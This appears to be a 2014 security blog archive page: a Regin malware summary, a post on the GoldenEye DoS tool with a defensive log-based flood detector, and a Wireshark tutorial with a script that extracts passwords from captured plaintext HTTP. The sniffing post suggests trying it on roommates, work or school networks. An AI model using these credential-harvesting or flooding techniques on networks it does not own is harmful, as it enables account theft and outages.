Tuesday, November 25, 2014

Regin: Top-tier espionage tool enables stealthy surveillance

Read full details here: Regin: Top-tier espionage tool enables stealthy surveillance

An advanced piece of malware, known as Regin, has been used in systematic spying campaigns against a range of international targets since at least 2008. A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals.
It is likely that its development took months, if not years, to complete and its authors have gone to great lengths to cover its tracks. Its capabilities and the level of resources behind Regin indicate that it is one of the main cyberespionage tools used by a nation state.
It’s unknown exactly when the first samples of Regin were created. Some of them have timestamps dating back to 2003.
The victims of Regin fall into the following categories:
  • Telecom operators
  • Government institutions
  • Multi-national political bodies
  • Financial institutions
  • Research institutions
  • Individuals involved in advanced mathematical/cryptographical research
So far, we’ve observed two main objectives from the attackers:
  • Intelligence gathering
  • Facilitating other types of attacks
While in most cases the attackers were focused on extracting sensitive information, such as e-mails and documents, we have observed cases where the attackers compromised telecom operators to enable the launch of additional sophisticated attacks. More about this in the GSM Targeting section of the full report.
Perhaps one of the most publicly known victims of Regin is Jean Jacques Quisquater (https://en.wikipedia.org/wiki/Jean-Jacques_Quisquater), a well-known Belgian cryptographer. In February 2014, Quisquater announced he was the victim of a sophisticated cyber intrusion incident. We were able to obtain samples from the Quisquater case and confirm they belong to the Regin platform.
Another interesting victim of Regin is a computer we are calling “The Magnet of Threats“. This computer belongs to a research institution and has been attacked by Turla, Mask/Careto, Regin, Itaduke, Animal Farm and some other advanced threats that do not have a public name, all co-existing happily on the same computer at some point.

Read the rest of it here: Regin: Top-tier espionage tool enables stealthy surveillance

Saturday, November 22, 2014

DoS website with GoldenEye – Layer 7 DoS tool with KeepAlive NoCache

It takes 15 seconds to bring down a web server! Tested the GoldenEye Layer 7 tool with KeepAlive and NoCache.

I've talked about testing a few DoS tools that can put a heavy load on HTTP servers in order to bring them to their knees by exhausting the resource pool. GoldenEye is the first of those tools and one of the newest I have discovered on GitHub. You can DoS a website with GoldenEye and bring it down within about 30 seconds, depending on how big its memory pool is. Of course, it won't work on protected servers or servers behind a proper WAF or IDS, but it is a useful tool for load-testing your own web server and amending your iptables/firewall rules accordingly. I will put several warnings and disclaimers in this post so that even the most feeble minds won't be able to deny having read them.
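Because the point of running GoldenEye against your own server is to tune your iptables rules afterwards, here is an added example of the defensive side (not code from this post or from GoldenEye). It reads Apache/Nginx combined-format access log lines, counts requests per client IP in a sliding time window, and emits candidate iptables rules for the offenders. The log sample is constructed, and the window size and threshold are assumptions to tune for your own server:

```python
"""Sliding-window request-rate detector for Layer 7 floods.

Added example, not code from the original post or from GoldenEye. It reads
access-log lines in the Apache/Nginx "combined" format, counts requests per
client IP inside a sliding time window, and emits candidate iptables rules
for the offenders. The log sample is constructed; WINDOW_SECONDS and
THRESHOLD are assumed starting values to tune for your own server.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

WINDOW_SECONDS = 10   # assumption: look at a 10-second sliding window
THRESHOLD = 50        # assumption: more than 50 requests per window is a flood

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def _log_line(ip, second, path):
    """Build one constructed combined-format log line (sample data only)."""
    return (f'{ip} - - [22/Nov/2014:10:00:{second:02d} +0000] '
            f'"GET {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"')


# Constructed sample: 198.51.100.7 sends 10 requests/second for 12 seconds with
# cache-busting query strings (what a KeepAlive + NoCache flood looks like in
# the log); 203.0.113.5 is an ordinary visitor.
SAMPLE_LOG = (
    [_log_line("198.51.100.7", s // 10, f"/?{s}") for s in range(120)]
    + [_log_line("203.0.113.5", s * 2, "/index.html") for s in range(5)]
)


def parse_line(line):
    """Return (ip, datetime, path) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"]


def detect_floods(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {ip: peak_requests_in_window} for IPs exceeding the threshold.

    Requests are counted, not connections: with Keep-Alive a flood can ride a
    handful of TCP connections, so a connection-count limit alone misses it.
    """
    events = sorted(filter(None, (parse_line(l) for l in lines)),
                    key=lambda e: e[1])
    recent = defaultdict(deque)   # ip -> timestamps inside the window
    peak = defaultdict(int)       # ip -> largest window count seen
    for ip, ts, _path in events:
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
    return {ip: n for ip, n in peak.items() if n > threshold}


def suggest_rules(offenders, port=80):
    """Candidate iptables rules to drop the offending sources on the web port."""
    return [f"iptables -I INPUT -s {ip} -p tcp --dport {port} -j DROP"
            for ip in sorted(offenders)]


if __name__ == "__main__":
    hits = detect_floods(SAMPLE_LOG)
    for ip, n in hits.items():
        print(f"{ip}: {n} requests within {WINDOW_SECONDS}s")
    print("\n".join(suggest_rules(hits)))
```

Run it against your real access log with `detect_floods(open("/var/log/nginx/access.log"))` after a GoldenEye test run; the flooder's IP should show up at a rate far above anything a browser produces, and the printed rules are a starting point, not something to apply blindly on a shared NAT address.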

Tuesday, November 11, 2014

Hack website password using WireShark

Read full details here: Hack website password using WireShark

Did you know that every time you fill in your username and password on a website and press ENTER, you are sending your password? Well, of course you know that. How else are you going to authenticate yourself to the website? But (yes, there is a small BUT here), when a website allows you to authenticate over HTTP (plaintext), it is very simple to capture that traffic and later analyse it from any machine on the LAN (and even across the Internet). That means someone can recover the website password for any site that uses plain HTTP for authentication.

To do it over the Internet, you need to be able to sit on a gateway or central hub on the path (a BGP router would do, if you have access to it and the traffic is routed through it).

But doing it from a LAN is easy and at the same time makes you wonder how insecure HTTP really is. You could be doing this to your roommate, on your work network, or even on a school, college or university network, assuming your capture point actually sees the victim's traffic (a hub or shared Wi-Fi, a mirror/SPAN port, or ARP spoofing on a switched network) and your LAN card can be put into promiscuous mode.
So lets try this on a simple website.

I will hide part of the website name (they are nice people and I respect their privacy). For the sake of this guide, I will show everything done on a single machine. As for you, try it between two VirtualBox/VMware/physical machines.
P.S. Note that a switched network only delivers other hosts' unicast traffic to their own ports, so capturing from a neighbouring machine may fail unless you have a hub, a mirror port or some other way of seeing that traffic.
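To show how little work is left once the bytes are captured, here is an added example (not code from this post). It takes the raw bytes of an HTTP request as Wireshark's "Follow TCP Stream" would show them and pulls the credentials out of either an HTTP Basic `Authorization` header or a form-encoded POST body. The captured requests below are constructed, and the hostnames, paths, field names and credentials in them are invented sample data:

```python
"""Pull login credentials out of a captured plaintext HTTP request.

Added example, not code from the original post. It takes the raw bytes of an
HTTP request as Wireshark's "Follow TCP Stream" would show them and extracts
credentials from either an HTTP Basic Authorization header or a
form-encoded POST body. The captured requests below are constructed, and the
hostnames, paths and credentials in them are invented sample data.
"""
import base64
from urllib.parse import parse_qs

# Field names that commonly carry the account and the secret in login forms
# (assumed list; extend it for the application you are testing).
USERNAME_FIELDS = ("username", "user", "login", "email", "uname")
PASSWORD_FIELDS = ("password", "passwd", "pass", "pwd")

# Constructed sample 1: a login form submitted over plain HTTP.
FORM_LOGIN = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 46\r\n"
    b"\r\n"
    b"username=alice&password=S3cret%21&submit=Login"
)

# Constructed sample 2: HTTP Basic authentication, which is only base64, not
# encryption; anyone on the wire can decode it.
BASIC_LOGIN = (
    b"GET /admin/ HTTP/1.1\r\n"
    + b"Host: intranet.example.com\r\n"
    + b"Authorization: Basic " + base64.b64encode(b"bob:hunter2") + b"\r\n"
    + b"\r\n"
)

# Constructed sample 3: an ordinary request with nothing to harvest.
PLAIN_GET = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (request_line, headers, body)."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    request_line, header_lines = lines[0], lines[1:]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


def extract_credentials(raw):
    """Return {"method", "host", "username", "password"} or None.

    Handles the two plaintext schemes a sniffer sees most often: HTTP Basic
    (base64 of "user:password") and an application/x-www-form-urlencoded body.
    """
    _request_line, headers, body = parse_http_request(raw)
    host = headers.get("host", "")

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            decoded = base64.b64decode(auth.split(None, 1)[1],
                                       validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return None
        user, _, pw = decoded.partition(":")
        return {"method": "basic", "host": host,
                "username": user, "password": pw}

    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "application/x-www-form-urlencoded" and body:
        fields = parse_qs(body.decode("utf-8", "replace"))
        user = next((fields[k][0] for k in USERNAME_FIELDS if k in fields), None)
        pw = next((fields[k][0] for k in PASSWORD_FIELDS if k in fields), None)
        if pw is not None:
            return {"method": "form", "host": host,
                    "username": user, "password": pw}
    return None


if __name__ == "__main__":
    for sample in (FORM_LOGIN, BASIC_LOGIN, PLAIN_GET):
        print(extract_credentials(sample))
```

With a real capture, the same bytes come out of Wireshark via Follow TCP Stream, or in bulk with `tshark -r capture.pcap -Y 'http.request.method == "POST"' -T fields -e http.file_data`. The only thing that stops this is TLS: the same request over HTTPS shows up in the capture as opaque records with no headers or body to parse.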

Read the rest of it here: Hack website password using WireShark

Wednesday, November 5, 2014

No internet for me!

Read full details here: No internet for me!

No Internet for me!!!
I am moving to a much faster Fibre connection, so temporarily living on a Mobile Internet.
This was me for the first few hours:

Then this happened!


  Feel free to comment via my Facebook or Twitter account in the meantime.

Enjoy and stay safe everyone.

Read the rest of it here: No internet for me!